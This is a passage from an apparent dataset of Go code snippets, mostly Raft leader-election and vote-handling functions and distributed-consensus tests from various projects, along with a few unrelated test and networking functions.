rf.currentTerm)\n\t\trf.stateLock.Unlock()\n\t\treturn\n\t}\n\n\tconvrt2Follower := false\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\tconvrt2Follower = true\n\t\trf.persist()\n\t}\n\n\tif rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\tlastLogIndex := int32(len(rf.log) - 1)\n\t\tlastLogTerm := rf.log[lastLogIndex].Term\n\n\t\tif args.LastLogTerm < lastLogTerm || (args.LastLogTerm == lastLogTerm && args.LastLogIndex < lastLogIndex) {\n\t\t\trf.votedFor = -1\n\t\t\trf.lastHeartbeat = time.Now()\n\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] index from [%v] is oldest, return\", rf.me, args.CandidateId)\n\n\t\t\tif convrt2Follower && rf.role != _Follower {\n\t\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] from %v Term :%v (non-follower) > currentTerm: %v, return\", rf.me, args.CandidateId, args.Term, rf.currentTerm)\n\t\t\t\trf.role = _Unknown\n\t\t\t\trf.stateLock.Unlock()\n\t\t\t\tselect {\n\t\t\t\tcase <-rf.closeCh:\n\t\t\t\tcase rf.roleCh <- _Follower:\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\trf.stateLock.Unlock()\n\t\t\treturn\n\t\t}\n\n\t\trf.votedFor = args.CandidateId\n\t\t// [WARNING] 一旦授权,应该重置超时\n\t\trf.lastHeartbeat = time.Now()\n\t\treply.VoteGranted = true\n\t\tDPrintf(\"[ReceiveRequestVote] [me %v] granted vote for %v\", rf.me, args.CandidateId)\n\t\tif rf.role != _Follower {\n\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] become follower\", rf.me)\n\t\t\trf.role = _Unknown\n\t\t\trf.stateLock.Unlock()\n\t\t\tselect {\n\t\t\tcase <-rf.closeCh:\n\t\t\t\treturn\n\t\t\tcase rf.roleCh <- _Follower:\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\trf.stateLock.Unlock()\n\t\treturn\n\t}\n\tDPrintf(\"[ReceiveRequestVote] [me %v] have voted: %v, return\", rf.me, rf.votedFor)\n\trf.stateLock.Unlock()\n}", "func TestPreVoteWithCheckQuorum(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\tn1.checkQuorum = true\n\tn2.checkQuorum = true\n\tn3.checkQuorum = true\n\n\tnt := newNetwork(n1, n2, n3)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// isolate node 1. node 2 and node 3 have leader info\n\tnt.isolate(1)\n\n\t// check state\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Fatalf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Fatalf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Fatalf(\"peer 3 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\t// node 2 will ignore node 3's PreVote\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// Do we have a leader?\n\tif n2.state != StateLeader && n3.state != StateFollower {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func (rf *Raft) isCandidateMoreUTD(args *RequestVoteArgs) bool {\n\tlastIndex := rf.absoluteLength() - 1\n\tif args.CLastLogTerm > rf.findLogTermByAbsoluteIndex(lastIndex) {\n\t\treturn true\n\t}\n\tif args.CLastLogTerm == rf.findLogTermByAbsoluteIndex(lastIndex) {\n\t\tif args.CLastLogIndex >= lastIndex {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func TestThatAByzantineLeaderCanNotCauseAForkBySendingTwoBlocks(t *testing.T) {\n\ttest.WithContextWithTimeout(t, 15*time.Second, func(ctx context.Context) {\n\t\tblock1 := mocks.ABlock(interfaces.GenesisBlock)\n\t\tnet := network.\n\t\t\tNewTestNetworkBuilder().\n\t\t\tWithNodeCount(4).\n\t\t\tWithTimeBasedElectionTrigger(1000 * time.Millisecond).\n\t\t\tWithBlocks(block1).\n\t\t\tBuild(ctx)\n\n\t\tnode0 := net.Nodes[0]\n\t\tnode1 := net.Nodes[1]\n\t\tnode2 := net.Nodes[2]\n\n\t\tnode0.Communication.SetOutgoingWhitelist([]primitives.MemberId{\n\t\t\tnode1.MemberId,\n\t\t\tnode2.MemberId,\n\t\t})\n\n\t\t// the leader (node0) is suggesting block1 to node1 and node2 (not to node3)\n\t\tnet.StartConsensus(ctx)\n\n\t\t// node0, node1 and node2 should reach consensus\n\t\tnet.WaitUntilNodesEventuallyCommitASpecificBlock(ctx, t, 0, block1, node0, node1, node2)\n\t})\n}", "func (le *LeaderElector) PollLeader() {\n\t//Ping leader repeatdly every 15sec, if hasnt responded for 2 consequent pings, init LeaderChange\n\t//The frequency can be changed in paxos.config.json file.\n\tif le.LeaderSID != NO_LEADER && le.LeaderSID != le.ThisServer.SID {\n\t\talive := false\n\t\tstillLeader := false\n\t\tfor i := 0; i < 2; i++ {\n\t\t\tok := call(le.CurrentLeader, \"LeaderElector.Alive\", new(interface{}), &stillLeader)\n\t\t\tif ok && stillLeader {\n\t\t\t\talive = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif !alive {\n\t\t\tdebug(\"[*] Info : LeaderElector : Leader with SID : %d && address : %s Suspected To have Failed. Starting Leader Election.\",\n\t\t\t\tle.LeaderSID, le.CurrentLeader)\n\t\t\tle.initElection()\n\t\t}\n\t} else if le.LeaderSID == NO_LEADER && !le.adjustingLead {\n\t\tle.initElection()\n\t}\n\t//Wait for 15 or specified secs\n\t<-time.After(le.PollLeaderFreq * time.Second)\n\tle.PollLeader()\n}", "func (rf *Raft) runElection() {\n\t// get election start time\n\tlastElectionCheck := time.Now()\n\n\trf.mu.Lock()\n\trf.currentTerm++\n\t// persist - updated current term\n\tdata := rf.GetStateBytes(false)\n\trf.persister.SaveRaftState(data)\n\trf.Log(LogInfo, \"running as candidate\")\n\n\t// set as candidate state and vote for ourselves,\n\t// also reset the timer\n\trf.votedFor = rf.me\n\trf.state = Candidate\n\trf.electionTimeout = GetRandomElectionTimeout()\n\n\t// for holding replies - we send out the requests concurrently\n\treplies := make([]*RequestVoteReply, len(rf.peers))\n\tfor servIdx := range rf.peers {\n\t\treplies[servIdx] = &RequestVoteReply{}\n\t}\n\n\t// send out requests concurrently\n\tfor servIdx := range rf.peers {\n\t\tif servIdx != rf.me {\n\t\t\targs := &RequestVoteArgs{\n\t\t\t\tCandidateTerm: rf.currentTerm,\n\t\t\t}\n\n\t\t\t// grab last log index and term - default to snapshot if log is []\n\t\t\tif len(rf.log) > 0 {\n\t\t\t\targs.LastLogIndex = rf.log[len(rf.log)-1].Index\n\t\t\t\targs.LastLogTerm = rf.log[len(rf.log)-1].Term\n\t\t\t} else {\n\t\t\t\targs.LastLogIndex = rf.lastIncludedIndex\n\t\t\t\targs.LastLogTerm = rf.lastIncludedTerm\n\t\t\t}\n\t\t\t// only place the reply into replies, when the RPC completes,\n\t\t\t// to prevent partial data (unsure if this can happen but seems like a good idea)\n\t\t\tgo func(servIdx int) {\n\t\t\t\treply := &RequestVoteReply{}\n\t\t\t\trf.Log(LogDebug, \"Sending RequestVote to servIdx\", servIdx)\n\t\t\t\tok := rf.sendRequestVote(servIdx, args, reply)\n\t\t\t\tif ok {\n\t\t\t\t\trf.Log(LogDebug, \"Received RequestVote reply from server\", servIdx, \"\\n - reply\", reply)\n\t\t\t\t\treplies[servIdx] = reply\n\t\t\t\t}\n\t\t\t}(servIdx)\n\t\t}\n\t}\n\trf.mu.Unlock()\n\n\t// while we still have time on the clock, poll\n\t// for election result\n\tfor !rf.killed() {\n\t\trf.mu.Lock()\n\t\tif rf.state == Follower {\n\t\t\trf.Log(LogInfo, \"now a follower\")\n\t\t\t// we must have received a heartbeat message from a new leader\n\t\t\t// stop the election\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t} else if rf.electionTimeout > 0 {\n\t\t\t// election still running\n\t\t\t// do a vote count and update time remaining\n\t\t\tcurrentTime := time.Now()\n\t\t\trf.electionTimeout -= (currentTime.Sub(lastElectionCheck))\n\t\t\tlastElectionCheck = currentTime\n\t\t\tvotes := 1 // we vote for ourselves automatically\n\t\t\tfor servIdx := range rf.peers {\n\t\t\t\t// need a successful vote AND need that our term hasn't increased (e.g. if\n\t\t\t\t// since the last loop, we voted for a server with a higher term)\n\t\t\t\tif servIdx != rf.me && replies[servIdx].VoteGranted && replies[servIdx].CurrentTerm == rf.currentTerm {\n\t\t\t\t\tvotes++\n\t\t\t\t}\n\t\t\t}\n\t\t\t// majority vote achieved - set state as leader and\n\t\t\t// start sending heartbeats\n\t\t\tif votes >= int(math.Ceil(float64(len(rf.peers))/2.0)) {\n\t\t\t\trf.Log(LogInfo, \"elected leader\", \"\\n - rf.log:\", rf.log, \"\\n - rf.commitIndex\", rf.commitIndex)\n\t\t\t\trf.state = Leader\n\n\t\t\t\t// get next index of the log for rf.nextIndex\n\t\t\t\tnextIdx := rf.lastIncludedIndex + 1\n\t\t\t\tif len(rf.log) > 0 {\n\t\t\t\t\tnextIdx = rf.log[len(rf.log)-1].Index + 1\n\t\t\t\t}\n\n\t\t\t\t// this volatile state is reinitialized on election\n\t\t\t\tfor servIdx := range rf.peers {\n\t\t\t\t\tif servIdx != rf.me {\n\t\t\t\t\t\trf.nextIndex[servIdx] = nextIdx\n\t\t\t\t\t\trf.matchIndex[servIdx] = 0\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tgo rf.heartbeatAppendEntries()\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\t// no result - need to rerun election\n\t\t\trf.Log(LogInfo, \"timed out as candidate\")\n\t\t\trf.mu.Unlock()\n\t\t\tgo rf.runElection()\n\t\t\treturn\n\t\t}\n\t\trf.mu.Unlock()\n\t\ttime.Sleep(defaultPollInterval)\n\t}\n}", "func handleAppendEntries(s *Sailor, state *storage.State, am *appendMessage, leaderId string) (appendReply, error) {\n\t// Check if the node needs to convert to the follower state\n\tif (s.state != follower && am.Term == s.currentTerm) || am.Term > s.currentTerm {\n\t\ts.becomeFollower(am.Term)\n\t}\n\n\trep := appendReply{Term: s.currentTerm, Success: false}\n\t// Reject the RPC if it has the wrong term\n\tif s.currentTerm > am.Term {\n\t\treturn rep, nil\n\t}\n\ts.timer.Reset(new_time()) // The message is from the leader, reset our election-start clock\n\ts.leaderId = leaderId\n\t// Reject the RPC if the position or the term is wrong\n\tif am.PrevLogIndex != 0 && (len(s.log) <= int(am.PrevLogIndex-1) ||\n\t\t(len(s.log) > 0 && s.log[am.PrevLogIndex-1].Term != am.PrevLogTerm)) {\n\t\treturn rep, nil\n\t}\n\n\trep.Success = true // The RPC is valid and the call will succeed\n\n\trep.PrepLower = am.PrevLogIndex + 1\n\trep.ComLower = s.volatile.commitIndex\n\n\t// Loop over the values we're dropping from our log. If we were the leader when\n\t// the values were proposed, then we reply to the client with a set failed message.\n\t// We know we were the leader if we were counting votes for that log entry.\n\tfor i := am.PrevLogIndex; i < uint(len(s.log)); i++ {\n\t\tif s.log[i].votes != 0 {\n\t\t\tfail := messages.Message{}\n\t\t\tfail.Source = s.client.NodeName\n\t\t\tfail.Type = \"setResponse\"\n\t\t\tfail.Error = \"SET FAILED\"\n\t\t\tfail.ID = s.log[i].Id\n\t\t\tfail.Key = s.log[i].Trans.Key\n\t\t\ts.client.SendToBroker(fail)\n\t\t}\n\t}\n\t// Drops the extra entries and adds the new ones\n\ts.log = append(s.log[:am.PrevLogIndex], am.Entries...)\n\t// If we have new values to commit\n\tif am.LeaderCommit > s.volatile.commitIndex {\n\t\t// Choose the min of our log size and the leader's commit index\n\t\tif int(am.LeaderCommit) <= len(s.log) {\n\t\t\ts.volatile.commitIndex = am.LeaderCommit\n\t\t} else {\n\t\t\ts.volatile.commitIndex = uint(len(s.log))\n\t\t}\n\t\t// Actually commit and apply the transactions to the state machine\n\t\tfor s.volatile.lastApplied < s.volatile.commitIndex {\n\t\t\ts.volatile.lastApplied += 1\n\t\t\tstate.ApplyTransaction(s.log[s.volatile.lastApplied-1].Trans)\n\t\t}\n\n\t}\n\trep.PrepUpper = uint(len(s.log))\n\trep.ComUpper = s.volatile.commitIndex\n\treturn rep, nil\n}", "func (ip *informerCache) NeedLeaderElection() bool {\n\treturn false\n}", "func TestInFlightLimit(t *testing.T) {\n\ttests := []struct {\n\t\tname string\n\t\tmaxInFlight int\n\t\texistingSwaps []*loopdb.LoopOut\n\t\texistingInSwaps []*loopdb.LoopIn\n\t\t// peerRules will only be set (instead of test default values)\n\t\t// is it is non-nil.\n\t\tpeerRules map[route.Vertex]*SwapRule\n\t\tsuggestions *Suggestions\n\t}{\n\t\t{\n\t\t\tname: \"none in flight, extra space\",\n\t\t\tmaxInFlight: 3,\n\t\t\tsuggestions: &Suggestions{\n\t\t\t\tOutSwaps: []loop.OutRequest{\n\t\t\t\t\tchan1Rec, chan2Rec,\n\t\t\t\t},\n\t\t\t\tDisqualifiedChans: noneDisqualified,\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"none in flight, exact match\",\n\t\t\tmaxInFlight: 2,\n\t\t\tsuggestions: &Suggestions{\n\t\t\t\tOutSwaps: []loop.OutRequest{\n\t\t\t\t\tchan1Rec, chan2Rec,\n\t\t\t\t},\n\t\t\t\tDisqualifiedChans: noneDisqualified,\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"one in flight, one allowed\",\n\t\t\tmaxInFlight: 2,\n\t\t\texistingSwaps: []*loopdb.LoopOut{\n\t\t\t\t{\n\t\t\t\t\tContract: autoOutContract,\n\t\t\t\t},\n\t\t\t},\n\t\t\tsuggestions: &Suggestions{\n\t\t\t\tOutSwaps: []loop.OutRequest{\n\t\t\t\t\tchan1Rec,\n\t\t\t\t},\n\t\t\t\tDisqualifiedChans: map[lnwire.ShortChannelID]Reason{\n\t\t\t\t\tchanID2: ReasonInFlight,\n\t\t\t\t},\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"max in flight\",\n\t\t\tmaxInFlight: 1,\n\t\t\texistingSwaps: []*loopdb.LoopOut{\n\t\t\t\t{\n\t\t\t\t\tContract: autoOutContract,\n\t\t\t\t},\n\t\t\t},\n\t\t\tsuggestions: &Suggestions{\n\t\t\t\tDisqualifiedChans: map[lnwire.ShortChannelID]Reason{\n\t\t\t\t\tchanID1: ReasonInFlight,\n\t\t\t\t\tchanID2: ReasonInFlight,\n\t\t\t\t},\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"max swaps exceeded\",\n\t\t\tmaxInFlight: 1,\n\t\t\texistingSwaps: []*loopdb.LoopOut{\n\t\t\t\t{\n\t\t\t\t\tContract: autoOutContract,\n\t\t\t\t},\n\t\t\t},\n\t\t\texistingInSwaps: []*loopdb.LoopIn{\n\t\t\t\t{\n\t\t\t\t\tContract: autoInContract,\n\t\t\t\t},\n\t\t\t},\n\t\t\tsuggestions: &Suggestions{\n\t\t\t\tDisqualifiedChans: map[lnwire.ShortChannelID]Reason{\n\t\t\t\t\tchanID1: ReasonInFlight,\n\t\t\t\t\tchanID2: ReasonInFlight,\n\t\t\t\t},\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"peer rules max swaps exceeded\",\n\t\t\tmaxInFlight: 2,\n\t\t\texistingSwaps: []*loopdb.LoopOut{\n\t\t\t\t{\n\t\t\t\t\tContract: autoOutContract,\n\t\t\t\t},\n\t\t\t},\n\t\t\t// Create two peer-level rules, both in need of a swap,\n\t\t\t// but peer 1 needs a larger swap so will be\n\t\t\t// prioritized.\n\t\t\tpeerRules: map[route.Vertex]*SwapRule{\n\t\t\t\tpeer1: {\n\t\t\t\t\tThresholdRule: NewThresholdRule(50, 0),\n\t\t\t\t\tType: swap.TypeOut,\n\t\t\t\t},\n\t\t\t\tpeer2: {\n\t\t\t\t\tThresholdRule: NewThresholdRule(40, 0),\n\t\t\t\t\tType: swap.TypeOut,\n\t\t\t\t},\n\t\t\t},\n\t\t\tsuggestions: &Suggestions{\n\t\t\t\tOutSwaps: []loop.OutRequest{\n\t\t\t\t\tchan1Rec,\n\t\t\t\t},\n\t\t\t\tDisqualifiedChans: noneDisqualified,\n\t\t\t\tDisqualifiedPeers: map[route.Vertex]Reason{\n\t\t\t\t\tpeer2: ReasonInFlight,\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n\n\tfor _, testCase := range tests {\n\t\ttestCase := testCase\n\n\t\tt.Run(testCase.name, func(t *testing.T) {\n\t\t\tcfg, lnd := newTestConfig()\n\t\t\tcfg.ListLoopOut = func(context.Context) ([]*loopdb.LoopOut, error) {\n\t\t\t\treturn testCase.existingSwaps, nil\n\t\t\t}\n\t\t\tcfg.ListLoopIn = func(context.Context) ([]*loopdb.LoopIn, error) {\n\t\t\t\treturn testCase.existingInSwaps, nil\n\t\t\t}\n\n\t\t\tlnd.Channels = []lndclient.ChannelInfo{\n\t\t\t\tchannel1, channel2,\n\t\t\t}\n\n\t\t\tparams := defaultParameters\n\t\t\tparams.AutoloopBudgetLastRefresh = testBudgetStart\n\n\t\t\tif testCase.peerRules != nil {\n\t\t\t\tparams.PeerRules = testCase.peerRules\n\t\t\t} else {\n\t\t\t\tparams.ChannelRules =\n\t\t\t\t\tmap[lnwire.ShortChannelID]*SwapRule{\n\t\t\t\t\t\tchanID1: chanRule,\n\t\t\t\t\t\tchanID2: chanRule,\n\t\t\t\t\t}\n\t\t\t}\n\n\t\t\tparams.MaxAutoInFlight = testCase.maxInFlight\n\n\t\t\t// By default we only have budget for one swap, increase\n\t\t\t// our budget so that we could recommend more than one\n\t\t\t// swap at a time.\n\t\t\tparams.AutoFeeBudget = defaultBudget * 2\n\n\t\t\ttestSuggestSwaps(\n\t\t\t\tt, newSuggestSwapsSetup(cfg, lnd, params),\n\t\t\t\ttestCase.suggestions, nil,\n\t\t\t)\n\t\t})\n\t}\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t//fmt.Printf(\"[::RequestVote]\\n\")\n\t// Your code here.\n\trf.mtx.Lock()\n\tdefer rf.mtx.Unlock()\n\tdefer rf.persist()\n\n\treply.VoteGranted = false\n\n\t// case 1: check term\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\tif args.Term > rf.currentTerm { // set term to max. and then maybe become leader.\n\t\trf.currentTerm = args.Term\n\t\trf.state = STATE_FOLLOWER\n\t\trf.voteFor = -1\n\t}\n\treply.Term = rf.currentTerm\n\n\t// case 2: check log\n\tisNewer := false\n\tif args.LastLogTerm == rf.log[len(rf.log)-1].Term {\n\t\tisNewer = args.LastLogIndex >= rf.log[len(rf.log)-1].LogIndex\n\t} else {\n\t\tisNewer = args.LastLogTerm > rf.log[len(rf.log)-1].Term\n\t}\n\n\tif (rf.voteFor == -1 || rf.voteFor == args.CandidateId) && isNewer {\n\t\trf.chanVoteOther <- 1\n\t\trf.state = STATE_FOLLOWER\n\t\treply.VoteGranted = true\n\t\trf.voteFor = args.CandidateId\n\t}\n\n}", "func (r *Requestor) RequestCandidate(ctx context.Context, hash []byte) (block.Block, error) {\n\tr.setRequesting(true)\n\tdefer r.setRequesting(false)\n\n\tif err := r.sendGetCandidate(hash); err != nil {\n\t\treturn block.Block{}, nil\n\t}\n\n\tfor {\n\t\tselect {\n\t\tcase <-ctx.Done():\n\t\t\tlog.WithField(\"hash\", hex.EncodeToString(hash)).Debug(\"failed to receive candidate from the network\")\n\t\t\treturn block.Block{}, errors.New(\"failed to receive candidate from the network\")\n\t\tcase cm := <-r.candidateQueue:\n\t\t\tif bytes.Equal(cm.Header.Hash, hash) {\n\t\t\t\treturn cm, nil\n\t\t\t}\n\t\t}\n\t}\n}", "func (r *Requestor) ProcessCandidate(srcPeerID string, msg message.Message) ([]bytes.Buffer, error) {\n\tif r.isRequesting() {\n\t\tif err := Validate(msg); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tcm := msg.Payload().(block.Block)\n\t\tr.candidateQueue <- cm\n\t}\n\n\treturn nil, nil\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\n\t//All Server rule\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif args.Term > rf.currentTerm {\n\t\trf.beFollower(args.Term)\n\t\t// TODO check\n\t\t// send(rf.voteCh)\n\t}\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\tif (args.Term < rf.currentTerm) || (rf.votedFor != NULL && rf.votedFor != args.CandidateId) {\n\t\t// Reply false if term < currentTerm (§5.1) If votedFor is not null and not candidateId,\n\t} else if args.LastLogTerm < rf.getLastLogTerm() || (args.LastLogTerm == rf.getLastLogTerm() &&\n\t\targs.LastLogIndex < rf.getLastLogIndex()) {\n\t\t//If the logs have last entries with different terms, then the log with the later term is more up-to-date.\n\t\t// If the logs end with the same term, then whichever log is longer is more up-to-date.\n\t\t// Reply false if candidate’s log is at least as up-to-date as receiver’s log\n\t} else {\n\t\t//grant vote\n\t\trf.votedFor = args.CandidateId\n\t\treply.VoteGranted = true\n\t\trf.state = Follower\n\t\trf.persist()\n\t\tsend(rf.voteCh) //because If election timeout elapses without receiving granting vote to candidate, so wake up\n\t}\n}", "func (le *LeaderElector) adjustLeadership() {\n\t//Try to regain leadership if this is the server with highest rank\n\t//or discover server with highest rank\n\tle.Lock()\n\tle.adjustingLead = true\n\tle.CurrentLeader = \"\"\n\tle.LeaderSID = NO_LEADER\n\tle.Unlock()\n\t<-time.After(le.RegainLeadFreq * time.Second)\n\tdebug(\"[*] Info : LeaderElector : Adjusting LeaderShip Election Started.\")\n\tle.initElection()\n\tle.Lock()\n\tle.adjustingLead = false\n\tle.Unlock()\n}", "func TestRaft2(t *testing.T) {\n\tack := make(chan bool)\n\n\tleader := raft.GetLeaderId()\n\n\t//Kill some one who is not a leader\n\ts1 := (leader + 1) % 5\n\traft.KillServer(s1)\n\tt.Log(\"Killed \", s1)\n\n\t//Once more\n\ts2 := (s1 + 1) % 5\n\traft.KillServer(s2)\n\tt.Log(\"Killed \", s2)\n\n\t//Kill leader now\n\tleader = raft.KillLeader()\n\n\t//Make sure new leader doesn't get elected\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tleaderId := raft.GetLeaderId()\n\t\tif leaderId != -1 {\n\t\t\tt.Error(\"Leader should not get elected!\")\n\t\t}\n\t\tack <- true\n\t})\n\t<-ack\n\n\t//Resurrect for next test cases\n\traft.ResurrectServer(leader)\n\traft.ResurrectServer(s1)\n\traft.ResurrectServer(s2)\n\n\t//Wait for 1 second for new leader to get elected\n\ttime.AfterFunc(1*time.Second, func() { ack <- true })\n\t<-ack\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\treply.VoterId = rf.peerId\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\tif args.Term > rf.currentTerm {\n\t\trf.stepDownToFollower(args.Term)\n\t}\n\tlastLog := rf.getLastLog()\n\tif (rf.votedFor == \"\" || rf.votedFor == args.CandidateId) && (lastLog.Term < args.LastLogTerm || (lastLog.Index <= args.LastLogIndex && lastLog.Term == args.LastLogTerm)) {\n\t\treply.Term = rf.currentTerm\n\t\trf.grantCh <- true\n\t\treply.VoteGranted = true\n\t\t// set voteFor\n\t\trf.votedFor = args.CandidateId\n\t\tlog.Printf(\"peer %v elect peer %v as leader\\n\", rf.peerId, args.CandidateId)\n\t}\n\treturn\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here.\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif rf.state == Follower {\n\t\trf.ResetHeartBeatTimer()\n\t}\n\n\t// term in candidate old than this follower\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tif args.Term > rf.currentTerm {\n\t\trf.UpdateNewTerm(args.Term)\n\t\trf.stateCh <- Follower\n\t}\n\n\tlogIndexSelf := len(rf.log) - 1\n\n\tvar isNew bool\n\t// the term is equal check the index\n\tif args.LastLogTerm == rf.log[logIndexSelf].Term {\n\t\tisNew = args.LastLogIndex >= logIndexSelf\n\t} else {\n\t\tisNew = args.LastLogTerm > rf.log[logIndexSelf].Term\n\t}\n\n\tif (rf.votedFor == -1 || rf.me == args.CandidateId) && isNew {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = true\n\t\trf.votedFor = args.CandidateId\n\t\trf.persist()\n\t\treturn\n\t} else {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t}\n\n}", "func TestRaft_SlowSendVote(t *testing.T) {\n\thooks := NewSlowVoter(\"sv_0\", \"sv_1\")\n\tcluster := newRaftCluster(t, testLogWriter, \"sv\", 5, hooks)\n\ts := newApplySource(\"SlowSendVote\")\n\tac := cluster.ApplyN(t, time.Minute, s, 10000)\n\tcluster.Stop(t, time.Minute)\n\thooks.Report(t)\n\tcluster.VerifyLog(t, ac)\n\tcluster.VerifyFSM(t)\n}", "func (rf *Raft) runForElection() {\n\trf.lock()\n\trf.CurrentTerm += 1\n\trf.VotedFor = -1\n\trf.CurrentElectionState = Candidate\n\tad.DebugObj(rf, ad.RPC, \"Starting election and advancing term to %d\", rf.CurrentTerm)\n\trf.writePersist()\n\trepliesChan := make(chan *RequestVoteReply, len(rf.peers)-1)\n\t// The term the election was started in\n\telectionTerm := rf.CurrentTerm\n\trf.unlock()\n\n\tfor peerNum, _ := range rf.peers {\n\t\tif peerNum == rf.me {\n\t\t\trf.lock()\n\t\t\trf.VotedFor = rf.me\n\t\t\tad.DebugObj(rf, ad.TRACE, \"voting for itself\")\n\t\t\trf.writePersist()\n\t\t\trf.unlock()\n\t\t} else {\n\t\t\tgo func(peerNum int, repliesChan chan *RequestVoteReply) {\n\t\t\t\trf.sendRequestVote(peerNum, repliesChan)\n\t\t\t}(peerNum, repliesChan)\n\t\t}\n\t}\n\n\tyesVotes := 1 // from yourself\n\tnoVotes := 0\n\trequiredToWin := rf.majoritySize()\n\tfor range rf.peers {\n\t\treply := <-repliesChan\n\n\t\trf.lock()\n\t\tassert(rf.CurrentElectionState != Leader)\n\t\tif rf.CurrentTerm != electionTerm {\n\t\t\tad.DebugObj(rf, ad.TRACE, \"advanced to term %d while counting results of election for term %d. \"+\n\t\t\t\t\"Abandoning election.\")\n\t\t\trf.unlock()\n\t\t\treturn\n\t\t}\n\n\t\tif reply.VoteGranted {\n\t\t\tyesVotes++\n\t\t} else {\n\t\t\tnoVotes++\n\t\t}\n\n\t\tad.DebugObj(rf, ad.TRACE, \"Got %+v from server %d, yes votes now at %d out of a required %d\",\n\t\t\treply, reply.VoterId, yesVotes, requiredToWin)\n\t\tif yesVotes >= requiredToWin {\n\t\t\tad.DebugObj(rf, ad.RPC, \"Won election!\")\n\t\t\t// non-blocking send\n\t\t\t// send the term number to prevent a bug where the raft advances to a new term before it notices it's\n\t\t\t// become a leader, so it becomes a second false leader.\n\t\t\tgo func(term int) { rf.becomeLeader <- term }(rf.CurrentTerm)\n\t\t\trf.unlock()\n\t\t\treturn\n\t\t} else if noVotes >= requiredToWin {\n\t\t\tad.DebugObj(rf, ad.RPC, \"Got %d no votes, can't win election. Reverting to follower\", noVotes)\n\t\t\trf.CurrentElectionState = Follower\n\t\t\trf.writePersist()\n\t\t\trf.unlock()\n\t\t\treturn\n\t\t} else {\n\t\t\trf.unlock()\n\t\t\t// wait for more votes\n\t\t}\n\t}\n}", "func TestComputeBestAskBidPrice0(t *testing.T) {\n\tpoolStorage := defaultPool\n\tpoolStorage.PoolCashBalance = decimal.NewFromFloat(10000)\n\tperpetual0.AmmPositionAmount = decimal.NewFromFloat(0)\n\tpoolStorage.Perpetuals[TEST_PERPETUAL_INDEX0] = perpetual0\n\tpoolStorage.Perpetuals[TEST_PERPETUAL_INDEX1] = perpetual0\n\n\tbestPrice := ComputeBestAskBidPrice(poolStorage, TEST_PERPETUAL_INDEX0, false)\n\tApproximate(t, bestPrice, decimal.NewFromFloat(100.1))\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer DPrintf(\"%d received RequestVote from %d, args.Term : %d, args.LastLogIndex: %d, args.LastLogTerm: %d, rf.log: %v, 